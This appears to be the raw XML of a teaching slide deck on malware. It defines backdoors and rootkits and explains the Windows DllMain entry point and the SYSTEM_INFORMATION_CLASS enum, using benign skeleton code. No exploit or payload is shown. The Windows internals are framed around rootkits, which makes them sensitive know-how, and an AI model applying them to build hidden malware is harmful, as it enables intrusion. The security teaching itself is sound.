                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Backdoors provide a means of bypassing normal security measures, making a system vulnerable to unauthorized access and exploitation.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Attackers can use backdoors to steal sensitive information, such as login credentials, financial data, or intellectual property.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Backdoors can be used as a launch point for further attacks, such as spreading malware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Reputation damage:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> The discovery of a backdoor can severely damage the reputation of a company or organization, potentially leading to loss of business and customers.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133350" indent="0">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A728BE"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pP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2023.09.21</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Rootkit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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132205" y="1301750"/>
            <a:ext cx="9928225" cy="4780280"/>
            <a:chOff x="998510" y="1183843"/>
            <a:chExt cx="9928225" cy="4780280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 215"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="998510" y="1333068"/>
              <a:ext cx="9928225" cy="4631055"/>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Rectangle 216"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>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Rectangle 218"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>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Freeform 219"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>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220"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>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221"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>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222"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>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223"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="图形 17" descr="templates\docerresourceshop\icons\\32313535373331353b32313535373332313bc8cbb9a4d6c7c4dcbbfac6f7c8cb"/>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506485" y="4632711"/>
              <a:ext cx="1260000" cy="1260000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1132205" y="1837690"/>
            <a:ext cx="949896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gn="just">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId14"/>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A rootkit is a type of malicious software that is designed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> the presence of other software, such as malware, on a computer system. Rootkits can be used to gain unauthorized access to a system, steal sensitive information, or carry out other malicious actions.</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-644" r="84596" b="8932"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236220" y="5021965"/>
            <a:ext cx="1029547" cy="1440000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="折角形 377"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955040" y="1355090"/>
            <a:ext cx="10281920" cy="3667125"/>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5"/>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E045DD"/>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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1050290" y="1321435"/>
            <a:ext cx="9919335" cy="370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1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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DllMain is a special function in a Windows Dynamic Link Library (DLL) that serves as an entry point for initializing and uninitializing the DLL when it's loaded and unloaded by processes. It's analogous to the main function in a C/C++ program but specific to DLLs. Here are the key points about DllMain:</a:t>
            </a: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Function Signature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023745" y="1162685"/>
            <a:ext cx="8144510" cy="220726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500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>BOOL WINAPI DllMain(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HINSTANCE hinstDLL,  // Handle to the DLL module</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DWORD fdwReason,     // Reason for calling the function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LPVOID lpReserved    // Reserved; should be NULL</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528955" y="3629660"/>
            <a:ext cx="11134090" cy="2501900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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hinstDLL</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a handle to the DLL module. It is typically used to identify the instance of the DLL and obtain information about it.</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fdwReason</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specifies the reason why DllMain is being called. It can have values like DLL_PROCESS_ATTACH, DLL_PROCESS_DETACH, DLL_THREAD_ATTACH, or DLL_THREAD_DETACH, indicating whether the DLL is being loaded or unloaded and whether it's happening for the entire process  or just for a specific thread.</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lpReserved</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reserved for future use and should be NULL.</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Return value and Entry and Exit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1263630" cy="46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DllMain should return TRUE if it succeeds or FALSE if it fails. If it returns FALSE during a process's or thread's attachment, the DLL's loading is aborted, and it's immediately unloaded. This is typically done when the DLL cannot initialize properly.</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Entry and Exit Point: DllMain is automatically called by the operating system when a process loads or unloads the DLL. You don't call it explicitly in your code; the OS takes care of this.</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991870" y="1075055"/>
            <a:ext cx="10208260" cy="5354320"/>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2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;Windows.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)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switch (fdwReason)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the DLL is loaded into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the DLL is unloaded from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a new thread is created</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a thread exits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return TRUE; // Return TRUE if successful</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SYSTEM_INFORMATION_CLASS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2287905" y="1042670"/>
            <a:ext cx="7616190" cy="5367655"/>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400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef enum class _SYSTEM_INFORMATION_CLASS {</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SystemBasicInformation = 0,</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SystemPerformanceInformation = 2,</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SystemTimeOfDayInformation = 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SystemProcessInformation = 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SystemProcessorPerformanceInformation = 8,</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SystemInterruptInformation = 23,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SystemExceptionInformation = 33,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SystemRegistryQuotaInformation = 37,</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SystemLookasideInformation = 45,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SystemCodeIntegrityInformation = 103,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SystemPolicyInformation = 134,</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SYSTEM_INFORMATION_CLASS;</a:t>
            </a:r>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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag475.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag476.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477.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMmY5MzdhMTM4MGYwZjY3MmUyNDAwYWI5ODI4MjA4MzUifQ=="/>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90000"/>
          </a:lnSpc>
          <a:defRPr lang="en-US" sz="20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F0">
            <a:alpha val="5000"/>
          </a:srgbClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:lnSpc>
            <a:spcPct val="100000"/>
          </a:lnSpc>
          <a:defRPr lang="en-US" sz="25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500">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            <a:cs typeface="Times New Roman" panose="0202060305040502030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1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2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2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2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2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26759</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>703</Paragraphs>
  <Slides>34</Slides>
  <Notes>11</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>64</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>34</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="125" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>阿里巴巴普惠体 R</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Times New Roman</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思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>思源黑体 CN Normal</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>宋体-简</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</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14_Office 主题</vt:lpstr>
      <vt:lpstr>15_Office 主题</vt:lpstr>
      <vt:lpstr>16_Office 主题</vt:lpstr>
      <vt:lpstr>17_Office 主题</vt:lpstr>
      <vt:lpstr>18_Office 主题</vt:lpstr>
      <vt:lpstr>19_Office 主题</vt:lpstr>
      <vt:lpstr>20_Office 主题</vt:lpstr>
      <vt:lpstr>21_Office 主题</vt:lpstr>
      <vt:lpstr>22_Office 主题</vt:lpstr>
      <vt:lpstr>23_Office 主题</vt:lpstr>
      <vt:lpstr>24_Office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zhong</cp:lastModifiedBy>
  <cp:revision>89</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-16T08:42:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-16T08:42:22Z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